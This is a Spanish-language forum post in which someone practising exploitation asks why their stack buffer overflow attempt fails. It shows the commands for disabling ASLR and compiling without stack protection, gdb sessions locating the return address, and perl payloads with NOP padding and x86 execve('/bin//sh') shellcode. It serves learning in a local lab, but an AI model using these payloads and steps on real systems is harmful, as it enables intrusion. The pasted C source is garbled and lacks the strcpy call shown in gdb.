les dire los pasos que hago para ver si me pueden ayudar mas facilmente
primero desactivo
Código:
randomize_va_space
Citar
cat /proc/sys/kernel/randomize_va_space
0
0
compilo el archivo vulnerable de esta manera
Citar
gcc -ggdb --no-stack-protector vuln.c -o vuln
ejecuto gdb y meto la cantidad de "A" que son necesarios
Citar
$(perl -e 'print "A" x 44 . "B" x 4')
Citar
(gdb) i r eip ebp
eip 0x42424242 0x42424242
ebp 0x41414141 0x41414141
(gdb)
eip 0x42424242 0x42424242
ebp 0x41414141 0x41414141
(gdb)
lo que quiere decir que si pongo una shell tendria que quedar... "A" = 44 - 25 = 19
Citar
$(perl -e 'print "A" x 19 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "B" x 4')
Citar
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) i r eip ebp
eip 0x42424242 0x42424242
ebp 0x80cd0bb0 0x80cd0bb0
0x42424242 in ?? ()
(gdb) i r eip ebp
eip 0x42424242 0x42424242
ebp 0x80cd0bb0 0x80cd0bb0
Aqui es donde tengo que buscar donde esta RET, lo hago de esta manera
Citar
$(perl -e 'print "A" x 19 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "B" x 4')
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) br overflow
Breakpoint 1 at 0x80483ea: file vuln.c, line 6.
(gdb) r AAA
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gazette/ejemplo_profit/exploit_foro/vuln AAA
Breakpoint 1, overflow (badbeef=0xbffff602 "AAA") at vuln.c:6
6 strcpy(buffer, badbeef);
(gdb) x/x buffer
0xbffff380: 0x00000000
(gdb)
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) br overflow
Breakpoint 1 at 0x80483ea: file vuln.c, line 6.
(gdb) r AAA
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gazette/ejemplo_profit/exploit_foro/vuln AAA
Breakpoint 1, overflow (badbeef=0xbffff602 "AAA") at vuln.c:6
6 strcpy(buffer, badbeef);
(gdb) x/x buffer
0xbffff380: 0x00000000
(gdb)
al parecer es
Código:
0xbffff380: 0x00000000
pero aqui viene el problema si pongo eso no me aparce ninguna shell, que podria estar mal?
Citar
$(perl -e 'print "\x90" x 19 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x80\xf3\xff\xbf"')
Program received signal SIGSEGV, Segmentation fault.
0xbffff380 in ?? ()
(gdb) c
Continuing.
Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
(gdb)
Program received signal SIGSEGV, Segmentation fault.
0xbffff380 in ?? ()
(gdb) c
Continuing.
Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
(gdb)
espero me puedan ayudar, abajo les dejo el codigo del archivo vulnerable
salu2
Código
#include <stdio.h> #include <string.h> void overflow(char *badbeef){ char buffer[32]; } int main(int argc, char *argv[]){ overflow(argv[1]); return 0; }